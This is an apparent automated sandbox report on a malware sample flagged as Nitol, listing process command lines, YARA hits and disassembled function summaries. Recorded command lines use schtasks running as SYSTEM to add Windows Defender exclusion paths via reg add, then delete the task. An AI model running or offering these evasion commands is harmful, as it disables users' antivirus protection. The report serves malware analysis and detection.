File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	22:22:30
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	22:22:31
Start date:	06/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	22:22:31
Start date:	06/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	22:22:31
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6bd4c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	22:22:31
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	22:22:31
Start date:	06/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	22:22:31
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff6bd4c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	22:22:31
Start date:	06/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff703250000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	22:22:31
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	22:22:31
Start date:	06/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	22:22:31
Start date:	06/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	22:22:31
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6bd4c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	22:22:31
Start date:	06/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	22:22:31
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	22:22:31
Start date:	06/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff683750000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	22:23:01
Start date:	06/01/2025
Path:	C:\Program Files (x86)\vhZp0W\vhZp0W.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\vhZp0W\vhZp0W.exe"
Imagebase:	0x80000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	22:23:04
Start date:	06/01/2025
Path:	C:\Program Files (x86)\vhZp0W\vhZp0W.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\vhZp0W\vhZp0W.exe"
Imagebase:	0x80000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	22:23:04
Start date:	06/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c echo.>c:\xxxx.ini
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	22:23:04
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	22:23:04
Start date:	06/01/2025
Path:	C:\Program Files (x86)\b3aEb0H\1y6U0V.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\b3aEb0H\1y6U0V.exe"
Imagebase:	0x950000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	22:23:05
Start date:	06/01/2025
Path:	C:\Program Files (x86)\b3aEb0H\1y6U0V.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\b3aEb0H\1y6U0V.exe"
Imagebase:	0x950000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	22:23:05
Start date:	06/01/2025
Path:	C:\Program Files (x86)\vhZp0W\vhZp0W.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\vhZp0W\vhZp0W.exe"
Imagebase:	0x80000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	22:24:01
Start date:	06/01/2025
Path:	C:\Program Files (x86)\vhZp0W\vhZp0W.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\vhZp0W\vhZp0W.exe"
Imagebase:	0x80000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	22:24:01
Start date:	06/01/2025
Path:	C:\Program Files (x86)\b3aEb0H\1y6U0V.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\b3aEb0H\1y6U0V.exe"
Imagebase:	0x950000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	32%
Total number of Nodes:	462
Total number of Limit Nodes:	7

Executed Functions

Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0000000140006D6C
@, xrefs: 0000000140006FA2

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00000001400073E2

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 0000000140005F30
malloc.MSVCRT ref: 0000000140005FD3
ReadFile.KERNELBASE ref: 0000000140006016

Strings

t, xrefs: 0000000140005ED1
l, xrefs: 0000000140005F82
a, xrefs: 0000000140005F96
m, xrefs: 0000000140005F5A
L, xrefs: 0000000140005EB9
t, xrefs: 0000000140005EF1
r, xrefs: 0000000140005F6E
s, xrefs: 0000000140005EC9
l, xrefs: 0000000140005FA0
l, xrefs: 0000000140005F9B
i, xrefs: 0000000140005EC1
M, xrefs: 0000000140005EA9
d, xrefs: 0000000140005F7D
c, xrefs: 0000000140005F69
M, xrefs: 0000000140005E99
s, xrefs: 0000000140005F5F
a, xrefs: 0000000140005EE9
l, xrefs: 0000000140005F87
., xrefs: 0000000140005ED9
v, xrefs: 0000000140005F64
o, xrefs: 0000000140005FA5
m, xrefs: 0000000140005F91
d, xrefs: 0000000140005EE1
c, xrefs: 0000000140005FAA
., xrefs: 0000000140005F78
p, xrefs: 0000000140005EB1
s, xrefs: 0000000140005EA1
t, xrefs: 0000000140005F73

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: File$CreateReadmalloc
String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
API String ID: 3950102678-3381721293
Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

Function 00007FFE1A511C00 Relevance: 12.2, APIs: 8, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFE1A511C28
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFE1A511C7A
_RTC_Initialize.LIBCMT ref: 00007FFE1A511CA8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFE1A511CCE
__scrt_release_startup_lock.LIBCMT ref: 00007FFE1A511CF9

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction ID: c21254168a6c38ba4aeb7cc295dc4afa669e855f3f2cc82f7fd314385894a44c
Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
Instruction Fuzzy Hash: 83817C61F0CF4385FA54ABA794412B92692BF57FE0F5445FBE90C476B2DE3CE8468600

Function 00007FFE1A511720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNEL32 ref: 00007FFE1A511753
FreeLibrary.KERNEL32 ref: 00007FFE1A511981

Part of subcall function 00007FFE1A511B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE1A511BC0
Part of subcall function 00007FFE1A511B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE1A511BC6

Part of subcall function 00007FFE1A511720: FindFirstFileA.KERNELBASE ref: 00007FFE1A511536

Strings

WordpadFilter.db, xrefs: 00007FFE1A511527

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
String ID: WordpadFilter.db
API String ID: 868324331-3647581008
Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction ID: 262a7618dd604510a41771ef6bd69b5565cfe51350de7ece001007f1a8e80642
Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction Fuzzy Hash: E6317C32B19F41C9E700CBA2D8406BD73A6FB89B98F1445BAEE4D13B54EE38D591C340

Function 00007FFE1A5111B0 Relevance: 3.2, APIs: 2, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFE1A5114EB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE1A5114F7

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction ID: 20d6554e5a77a0e93d02f1eb56233782f8c58d09a44b0c09e4f8f4e9a80f9ef3
Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction Fuzzy Hash: A3813A22B1DB8245E6118B3698401B9B695FF57FE4F1483BBEE59577A2EF3CE0918300

Non-executed Functions

Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
EnterCriticalSection.KERNEL32 ref: 0000000140001B48
LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
EnterCriticalSection.KERNEL32 ref: 0000000140001BE6
LeaveCriticalSection.KERNEL32 ref: 0000000140001C67
EnterCriticalSection.KERNEL32 ref: 0000000140001C84
LeaveCriticalSection.KERNEL32 ref: 0000000140001D0D
lstrlenW.KERNEL32 ref: 0000000140001D1F
GetProcessHeap.KERNEL32 ref: 0000000140001D2E
HeapAlloc.KERNEL32 ref: 0000000140001D3C
EnterCriticalSection.KERNEL32 ref: 0000000140001D6F
LeaveCriticalSection.KERNEL32 ref: 0000000140001DF0
lstrlenW.KERNEL32 ref: 0000000140001DFF
GetProcessHeap.KERNEL32 ref: 0000000140001E0E
HeapAlloc.KERNEL32 ref: 0000000140001E1C
EnterCriticalSection.KERNEL32 ref: 0000000140001E4F
LeaveCriticalSection.KERNEL32 ref: 0000000140001ED0
EnterCriticalSection.KERNEL32 ref: 0000000140001EED
LeaveCriticalSection.KERNEL32 ref: 0000000140001F6E
lstrlenW.KERNEL32 ref: 0000000140001F7D
GetProcessHeap.KERNEL32 ref: 0000000140001F8C
HeapAlloc.KERNEL32 ref: 0000000140001F9A
EnterCriticalSection.KERNEL32 ref: 0000000140001FCD
LeaveCriticalSection.KERNEL32 ref: 000000014000204E
lstrlenW.KERNEL32 ref: 000000014000205D
GetProcessHeap.KERNEL32 ref: 000000014000206C
HeapAlloc.KERNEL32 ref: 000000014000207A
EnterCriticalSection.KERNEL32 ref: 00000001400020B4
LeaveCriticalSection.KERNEL32 ref: 000000014000214E

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
String ID:
API String ID: 3526400053-0
Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740

Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
OpenProcessToken.ADVAPI32 ref: 0000000140004007
GetLastError.KERNEL32 ref: 0000000140004011
LookupPrivilegeValueW.ADVAPI32 ref: 000000014000403A
AdjustTokenPrivileges.ADVAPI32 ref: 0000000140004080
GetLastError.KERNEL32 ref: 000000014000408A
CloseHandle.KERNEL32 ref: 0000000140004095
EnterCriticalSection.KERNEL32 ref: 00000001400040B3
LeaveCriticalSection.KERNEL32 ref: 000000014000412B
GetVersionExW.KERNEL32 ref: 0000000140004155
RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
RpcServerListen.RPCRT4 ref: 00000001400041D3
CreateWaitableTimerW.KERNEL32 ref: 0000000140004205
CreateEventW.KERNEL32 ref: 000000014000421C
SetWaitableTimer.KERNEL32 ref: 0000000140004289

Strings

ampStartSingletone: logging started, settins=%s, xrefs: 0000000140003FD5
null, xrefs: 0000000140003FCE
SeLoadDriverPrivilege, xrefs: 000000014000402A

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
API String ID: 3408796845-4213300970
Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44

Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
